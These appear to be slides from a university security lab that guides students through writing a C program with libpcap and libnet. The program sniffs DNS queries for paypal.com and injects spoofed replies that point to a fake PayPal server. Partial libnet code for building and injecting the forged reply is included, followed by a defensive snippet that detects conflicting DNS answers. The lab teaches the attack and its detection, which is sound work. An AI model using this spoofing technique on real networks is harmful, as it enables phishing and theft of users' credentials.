Lab 2: SSL Security Attack June 17, 2008 Hyun Jin Kim.


Objective
Configure DNS such that gets resolved to our own IP address of the “attack” server
– Paypal uses SSL protocol.

Normal DNS Query Processing (diagram labels: DNS Server, Paypal’s Server)

Attacking DNS Request (diagram labels: DNS Server, Paypal Server, Fake Paypal Server, Filter)

What We Will Do
Write a program that injects a spoofed DNS Response when the source queries the IP address of
C programming
– A basic code skeleton is provided.
– Attacker’s fake server is also provided.

Libraries
Libpcap
– To capture DNS requests
– /usr/include/pcap.h
Libnet
– To inject fake DNS replies
– /usr/include/libnet.h

Procedures
Setup for packet sniffing
Grab packets
Check if packets are DNS queries
If the query is for www.paypal.com, inject a spoofed DNS response back
Web browser will direct to attacker’s fake paypal website!

Step 1: Packet Sniffing Setup
Find the network interface for sniffing
– device = pcap_lookupdev(errbuf);
– eth0 in our case
Set up for sniffing
– capdev = set_cap_dev(device, filter);
– filter specifies some properties of DNS Requests
  – UDP packets
  – Destination port = 53

Step 2: Grab a DNS Query Packet
Grab a packet (first fill-in)
– packet = (u_char *) pcap_next(capdev, &pcap_hdr);
Check if the packet is a DNS Query
– i.e., Destination port = 53?
Check if the DNS Query is for

Step 3: Create Spoofed DNS Response
Create a new DNS Response with Attacker’s IP address
Send it back to the source
void spoof_dns(char *device)
– Open a raw socket
– Start creating the header for the spoofed response

Step 3: Create Spoofed DNS Response
Header Construction
– Build DNS Header (fill in)
– dns = libnet_build_dnsv4(LIBNET_DNS_H,  /* header size */
        ntohs(spoofpacket.dns_id),      /* dns id */
        0x8100,                         /* control flags (QR,AA,RD,*/
        1,                              /* number of questions */
        1,                              /* number of answer RR's */
        0,                              /* number of authority RR's*/
        0,                              /* number of additional RR's*/
        spoofpacket.payload,            /* payload */
        spoofpacket.payload_size,       /* payload length */
        handler,                        /* libnet handler */
        0);                             /* ptag */
– Build UDP Header
– Build IP Header
– Calculate Checksum (fill in)
    libnet_toggle_checksum(handler, udp, 1);
    libnet_toggle_checksum(handler, ip, 1);

Step 4: Inject DNS Response
Inject the packet (fill in)
– inject_size = libnet_write(handler);
Destroy the packet (fill in)
– libnet_destroy (handler);
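
Seen from the monitoring side, a response injected as in Steps 1 to 4 normally arrives alongside the real DNS server's reply, so the client receives two answers for one transaction ID. The following is an added example, not part of the lab skeleton: it parses DNS responses and flags a second answer that maps the same transaction to a different address. The function names, the 64-entry table and the sample packets for example.test are assumptions constructed for illustration.

```c
#include <stdint.h>
#include <string.h>

/* Skip a DNS name (labels or a compression pointer); returns 0 on overrun. */
static size_t skip_name(const uint8_t *m, size_t len, size_t off) {
    while (off < len) {
        if (m[off] == 0) return off + 1;
        if ((m[off] & 0xC0) == 0xC0) return off + 2;
        off += (size_t)m[off] + 1;
    }
    return 0;
}
/* Copy the first A-record address of a response into *addr; 0 if none. */
int first_a_record(const uint8_t *m, size_t len, uint32_t *addr) {
    if (len < 12 || !(m[2] & 0x80)) return 0;       /* QR clear: a query */
    unsigned qd = m[4] << 8 | m[5], an = m[6] << 8 | m[7];
    size_t off = 12;
    for (; qd; qd--)                                /* skip the questions */
        if (!(off = skip_name(m, len, off)) || (off += 4) > len) return 0;
    for (; an; an--) {
        if (!(off = skip_name(m, len, off)) || off + 10 > len) return 0;
        unsigned type = m[off] << 8 | m[off + 1];
        unsigned rdlen = m[off + 8] << 8 | m[off + 9];
        if ((off += 10) + rdlen > len) return 0;
        if (type == 1 && rdlen == 4) { memcpy(addr, m + off, 4); return 1; }
        off += rdlen;
    }
    return 0;
}
static struct { uint32_t client, addr; uint16_t id; } seen[64]; static int nseen;
/* Feed every UDP payload sent from port 53 to `client` (hypothetical hook).
 * Returns 1 when an already-answered transaction gets a different address. */
int conflicting_response(uint32_t client, const uint8_t *m, size_t len) {
    uint32_t addr;
    if (!first_a_record(m, len, &addr)) return 0;
    uint16_t id = (uint16_t)(m[0] << 8 | m[1]);
    for (int i = 0; i < nseen; i++)
        if (seen[i].client == client && seen[i].id == id)
            return seen[i].addr != addr;
    if (nseen < 64) {                               /* demo table, no eviction */
        seen[nseen].client = client; seen[nseen].addr = addr;
        seen[nseen++].id = id;
    }
    return 0;
}
/* Constructed sample: header, question "example.test", start of one A RR. */
#define PREFIX 0x1a,0x2b,0x81,0x80,0,1,0,1,0,0,0,0, 7,'e','x','a','m','p','l','e', \
    4,'t','e','s','t',0, 0,1,0,1, 0xc0,0x0c,0,1,0,1,0,0,0,60,0,4
static const uint8_t genuine[] = { PREFIX, 192, 0, 2, 10 };  /* first reply */
static const uint8_t forged[] = { PREFIX, 198, 51, 100, 7 }; /* same id, new IP */
```

A resolver that retransmits can legitimately return a different address for a round-robin name, so a hit is a lead to investigate rather than proof of spoofing.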

Test
Compile
– Type make
Run
– Type ./sslattack
Open a web browser
Type
– No attack
Type
– Certificate Warning Sign

Certificate

Spoofed paypal.com

Actual paypal.com